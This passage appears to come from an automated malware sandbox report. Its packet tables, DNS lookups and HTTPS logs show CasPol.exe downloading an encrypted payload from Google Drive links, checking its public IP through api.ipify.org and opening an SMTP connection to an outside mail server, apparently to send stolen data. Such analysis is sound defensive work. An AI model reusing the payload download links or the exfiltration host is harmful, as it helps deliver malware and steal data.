                            Mar 13, 2023 14:10:20.989989996 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.990087032 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.990151882 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.990168095 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.990278006 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.990291119 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.990430117 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.990437984 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.990478039 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.990683079 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.990744114 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.990866899 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.990890026 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.990902901 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.990979910 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.991000891 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.991029024 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.991039991 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.991136074 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.991154909 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.991168976 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.991180897 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.991367102 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.991430044 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.991677046 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.991830111 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.991894007 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.991946936 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992010117 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992043018 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.992058992 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992202044 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992240906 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.992255926 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992338896 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.992419958 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.992549896 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992645979 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992754936 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992762089 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.992775917 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992850065 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992871046 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.992924929 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.992927074 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.992937088 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.993084908 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.993403912 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.993555069 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.993568897 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.993685961 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.993751049 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.993762970 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.993777990 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.993874073 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.993920088 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.993920088 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.993936062 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.994056940 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.994112015 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.994380951 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.994499922 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.994585037 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.994600058 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.994709969 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.994715929 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.994770050 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.994770050 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.994860888 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.994921923 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.994949102 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:22.522723913 CET49809443192.168.11.2064.185.227.155
                            Mar 13, 2023 14:10:22.522748947 CET4434980964.185.227.155192.168.11.20
                            Mar 13, 2023 14:10:22.523019075 CET49809443192.168.11.2064.185.227.155
                            Mar 13, 2023 14:10:22.524274111 CET49809443192.168.11.2064.185.227.155
                            Mar 13, 2023 14:10:22.524282932 CET4434980964.185.227.155192.168.11.20
                            Mar 13, 2023 14:10:23.541068077 CET4434980964.185.227.155192.168.11.20
                            Mar 13, 2023 14:10:23.541366100 CET49809443192.168.11.2064.185.227.155
                            Mar 13, 2023 14:10:23.544528961 CET49809443192.168.11.2064.185.227.155
                            Mar 13, 2023 14:10:23.544540882 CET4434980964.185.227.155192.168.11.20
                            Mar 13, 2023 14:10:23.544769049 CET4434980964.185.227.155192.168.11.20
                            Mar 13, 2023 14:10:23.546878099 CET49809443192.168.11.2064.185.227.155
                            Mar 13, 2023 14:10:23.588354111 CET4434980964.185.227.155192.168.11.20
                            Mar 13, 2023 14:10:23.807955980 CET4434980964.185.227.155192.168.11.20
                            Mar 13, 2023 14:10:23.808017015 CET4434980964.185.227.155192.168.11.20
                            Mar 13, 2023 14:10:23.808226109 CET49809443192.168.11.2064.185.227.155
                            Mar 13, 2023 14:10:23.809003115 CET49809443192.168.11.2064.185.227.155
                            Mar 13, 2023 14:10:29.733206987 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.748784065 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.749097109 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.798228979 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.798670053 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.814771891 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.815026999 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.831947088 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.832490921 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.853718996 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.853794098 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.853849888 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.853895903 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.854078054 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.855053902 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.857793093 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.873749971 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.890108109 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.906183958 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.906656027 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.923636913 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.924202919 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.943969011 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.944334030 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.960155964 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.960879087 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.982122898 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:29.982599974 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:29.998131990 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.000096083 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.000149965 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.000197887 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.000403881 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.001090050 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.001141071 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.001190901 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.015765905 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.015801907 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.015829086 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.015944004 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.016100883 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.016529083 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.016789913 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.016872883 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.016896963 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.016983032 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.017040968 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.017287016 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.017393112 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.017637968 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.017697096 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.017878056 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:10:30.031712055 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.032234907 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.032644987 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.032983065 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.033312082 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.033548117 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.033596992 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.033864975 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.033900023 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.036248922 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:10:30.087116957 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:12:09.752726078 CET49816587192.168.11.2095.172.86.31
                            Mar 13, 2023 14:12:09.769568920 CET5874981695.172.86.31192.168.11.20
                            Mar 13, 2023 14:12:09.770258904 CET49816587192.168.11.2095.172.86.31

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 13, 2023 14:09:56.599601984 CET5972653192.168.11.201.1.1.1
                            Mar 13, 2023 14:09:56.609072924 CET53597261.1.1.1192.168.11.20
                            Mar 13, 2023 14:09:57.296830893 CET5744653192.168.11.201.1.1.1
                            Mar 13, 2023 14:09:57.332468987 CET53574461.1.1.1192.168.11.20
                            Mar 13, 2023 14:10:20.663702965 CET5864753192.168.11.201.1.1.1
                            Mar 13, 2023 14:10:20.696158886 CET53586471.1.1.1192.168.11.20
                            Mar 13, 2023 14:10:22.486104965 CET6528553192.168.11.201.1.1.1
                            Mar 13, 2023 14:10:22.495615005 CET53652851.1.1.1192.168.11.20
                            Mar 13, 2023 14:10:29.715382099 CET5233553192.168.11.201.1.1.1
                            Mar 13, 2023 14:10:29.732424021 CET53523351.1.1.1192.168.11.20

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 13, 2023 14:09:56.599601984 CET192.168.11.201.1.1.10xfb63Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                            Mar 13, 2023 14:09:57.296830893 CET192.168.11.201.1.1.10xfafbStandard query (0)doc-04-6g-docs.googleusercontent.comA (IP address)IN (0x0001)false
                            Mar 13, 2023 14:10:20.663702965 CET192.168.11.201.1.1.10x12caStandard query (0)doc-10-6g-docs.googleusercontent.comA (IP address)IN (0x0001)false
                            Mar 13, 2023 14:10:22.486104965 CET192.168.11.201.1.1.10xd56aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                            Mar 13, 2023 14:10:29.715382099 CET192.168.11.201.1.1.10x299cStandard query (0)mail.primevisionuae.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 13, 2023 14:09:50.422240019 CET1.1.1.1192.168.11.200xbfd1No error (0)au.c-0001.c-msedge.netc-0001.c-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 13, 2023 14:09:50.422240019 CET1.1.1.1192.168.11.200xbfd1No error (0)c-0001.c-msedge.net13.107.4.50A (IP address)IN (0x0001)false
                            Mar 13, 2023 14:09:56.609072924 CET1.1.1.1192.168.11.200xfb63No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                            Mar 13, 2023 14:09:57.332468987 CET1.1.1.1192.168.11.200xfafbNo error (0)doc-04-6g-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                            Mar 13, 2023 14:09:57.332468987 CET1.1.1.1192.168.11.200xfafbNo error (0)googlehosted.l.googleusercontent.com172.217.16.193A (IP address)IN (0x0001)false
                            Mar 13, 2023 14:10:20.696158886 CET1.1.1.1192.168.11.200x12caNo error (0)doc-10-6g-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                            Mar 13, 2023 14:10:20.696158886 CET1.1.1.1192.168.11.200x12caNo error (0)googlehosted.l.googleusercontent.com142.250.186.65A (IP address)IN (0x0001)false
                            Mar 13, 2023 14:10:22.495615005 CET1.1.1.1192.168.11.200xd56aNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                            Mar 13, 2023 14:10:22.495615005 CET1.1.1.1192.168.11.200xd56aNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                            Mar 13, 2023 14:10:22.495615005 CET1.1.1.1192.168.11.200xd56aNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                            Mar 13, 2023 14:10:22.495615005 CET1.1.1.1192.168.11.200xd56aNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                            Mar 13, 2023 14:10:29.732424021 CET1.1.1.1192.168.11.200x299cNo error (0)mail.primevisionuae.com95.172.86.31A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • drive.google.com
                            • doc-10-6g-docs.googleusercontent.com
                            • api.ipify.org

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.11.2049798142.250.184.206443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            TimestampkBytes transferredDirectionData
                            2023-03-13 13:09:56 UTC0OUTGET /uc?export=download&id=1ImsPjLy7QqLaprcBEvqIu0wU4k4KAVmk HTTP/1.1
                            Host: drive.google.com
                            Connection: Keep-Alive
                            2023-03-13 13:09:57 UTC0INHTTP/1.1 303 See Other
                            Content-Type: application/binary
                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                            Pragma: no-cache
                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                            Date: Mon, 13 Mar 2023 13:09:57 GMT
                            Location: https://doc-04-6g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6u793njav1g4baio7lnpnccv2fpran9l/1678712925000/13880735354025239062/*/1ImsPjLy7QqLaprcBEvqIu0wU4k4KAVmk?e=download&uuid=05793a54-fa72-47dd-bffd-b13ffc10d1a1
                            Strict-Transport-Security: max-age=31536000
                            Cross-Origin-Opener-Policy: same-origin
                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                            Content-Security-Policy: script-src 'report-sample' 'nonce-newvFELWrOmkZ1fJjIvO7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            Server: ESF
                            Content-Length: 0
                            X-XSS-Protection: 0
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.11.2049807142.250.184.206443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            TimestampkBytes transferredDirectionData
                            2023-03-13 13:10:20 UTC1OUTGET /uc?export=download&id=1vJVQs63DZwsuwssxWJ8F3J7tzecR7IBa HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Host: drive.google.com
                            Cache-Control: no-cache
                            2023-03-13 13:10:20 UTC1INHTTP/1.1 303 See Other
                            Content-Type: application/binary
                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                            Pragma: no-cache
                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                            Date: Mon, 13 Mar 2023 13:10:20 GMT
                            Location: https://doc-10-6g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/28h7hnips76btsibg57lgmgj73ftidkn/1678713000000/13880735354025239062/*/1vJVQs63DZwsuwssxWJ8F3J7tzecR7IBa?e=download&uuid=92dd0e3d-baea-43aa-a822-2534961c9412
                            Strict-Transport-Security: max-age=31536000
                            Content-Security-Policy: script-src 'nonce-9qic66F0ECQxajbVG87mdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                            Cross-Origin-Opener-Policy: same-origin
                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                            Server: ESF
                            Content-Length: 0
                            X-XSS-Protection: 0
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.11.2049808142.250.186.65443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            TimestampkBytes transferredDirectionData
                            2023-03-13 13:10:20 UTC3OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/28h7hnips76btsibg57lgmgj73ftidkn/1678713000000/13880735354025239062/*/1vJVQs63DZwsuwssxWJ8F3J7tzecR7IBa?e=download&uuid=92dd0e3d-baea-43aa-a822-2534961c9412 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Cache-Control: no-cache
                            Host: doc-10-6g-docs.googleusercontent.com
                            Connection: Keep-Alive
                            2023-03-13 13:10:20 UTC3INHTTP/1.1 200 OK
                            X-GUploader-UploadID: ADPycdvd9mSSNo817f48mie4XbneM9LCt4yxJ1ui-Nyo7Xi9DXQVRN8fPjx_0f_i1eZZswZRRy6wOJfTDz2lLw4trSiE8w
                            Content-Type: application/octet-stream
                            Content-Disposition: attachment; filename="ZqmsqLf243.pfm"; filename*=UTF-8''ZqmsqLf243.pfm
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Credentials: false
                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token
                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                            Content-Length: 171072
                            Date: Mon, 13 Mar 2023 13:10:20 GMT
                            Expires: Mon, 13 Mar 2023 13:10:20 GMT
                            Cache-Control: private, max-age=0
                            X-Goog-Hash: crc32c=oajTwQ==
                            Server: UploadServer
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
                            2023-03-13 13:10:20 UTC7INData Raw: 2f 66 40 27 ef 22 ad 43 73 eb a2 7f 26 c9 78 13 65 61 8a 09 fc 52 77 87 68 44 44 4b 9b da d1 e4 a0 f8 85 02 7f cf 24 18 f9 3e a4 69 74 04 4e ac 3f 0e eb 48 df 62 01 bc 01 54 f9 2e 29 65 13 ff fd b3 8b 9d b2 ae cb f5 a3 8d b7 3f b0 85 06 04 e9 d5 5e e2 94 b0 a1 67 b3 02 a0 b0 d0 32 66 66 04 7a f0 7d 0c d7 6a 20 66 51 92 74 c0 9d 29 15 00 7f e7 7d e0 74 0f 45 36 a4 af db 4a eb ca b4 15 7d 8b 5e ae 04 df e6 c1 32 b5 1e 49 62 0c 70 dc 8b d5 89 a8 e2 6a 96 47 1c c5 f8 85 7b e7 1c 6f 04 2b ac 30 03 41 c7 3f de 23 ee 74 5a ab 22 a1 eb 07 ed d1 a9 5a 29 b9 f8 07 52 7e 5a 44 e1 25 a6 b1 57 34 a5 75 6f 23 87 dc ca c8 f3 6e 1f e2 a2 9b 81 f4 d0 a5 c1 41 da bf 93 51 b8 20 07 09 0e 1b fe 37 10 d1 90 4a 0a 09 3a 03 c5 25 97 2f 49 18 ca a8 d6 74 d1 8a 33 ce d2 a9 06 a3
                            Data Ascii: /f@'"Cs&xeaRwhDDK$>itN?HbT.)e?^g2ffz}j fQt)}tE6J}^2IbpjG{o+0A?#tZ"Z)R~ZD%W4uo#nAQ 7J:%/It3
                            2023-03-13 13:10:20 UTC11INData Raw: e9 e0 9d f7 a8 8b 62 8d bd c7 24 39 8b a6 3f 86 b0 ba 21 27 67 11 e4 bc e8 48 c1 cc 80 2d bf 7f a4 e1 0a 4c 92 cb b9 09 75 5d 3f 73 22 32 e2 70 b1 39 c3 05 40 12 22 06 60 8e 82 ba ae 2a 0a e8 65 61 57 cd 48 8a b9 ff b2 3c cf 84 1c c6 d1 ba 3d c2 e3 33 97 43 80 f2 87 e9 05 b9 be f5 e4 71 6e 05 67 d3 4e e3 ea f7 5e e6 ac 04 b0 4f 40 b5 27 8d f9 6c b7 54 2a 48 c2 02 0a be 9b 34 1e da 90 95 6d 8d b0 5f e9 e5 cd b3 a2 39 49 48 61 88 75 60 a0 3a ec 70 0b 28 20 38 d5 38 cc 66 01 9c 38 bf 67 2f b0 4b 30 60 2c a9 fc ae a9 79 d9 a7 5a ae 9d cc b7 de 86 b5 3b 04 44 c2 0e 89 4f 57 68 3f b3 05 3f 0d 13 c1 e1 d3 17 87 62 49 08 af dc 4c 4e e3 20 72 d4 a4 3d fe 99 70 e0 fa 5b 88 39 4a cb 5f 7a 3e 2b 7e 17 2e db 91 a3 3f be ba df 39 a6 cc 11 b3 fa e2 78 21 cf ed e9 1b 9d
                            Data Ascii: b$9?!'gH-Lu]?s"2p9@"`*eaWH<=3CqngN^O@'lT*H4m_9IHau`:p( 88f8g/K0`,yZ;DOWh??bILN r=p[9J_z>+~.?9x!
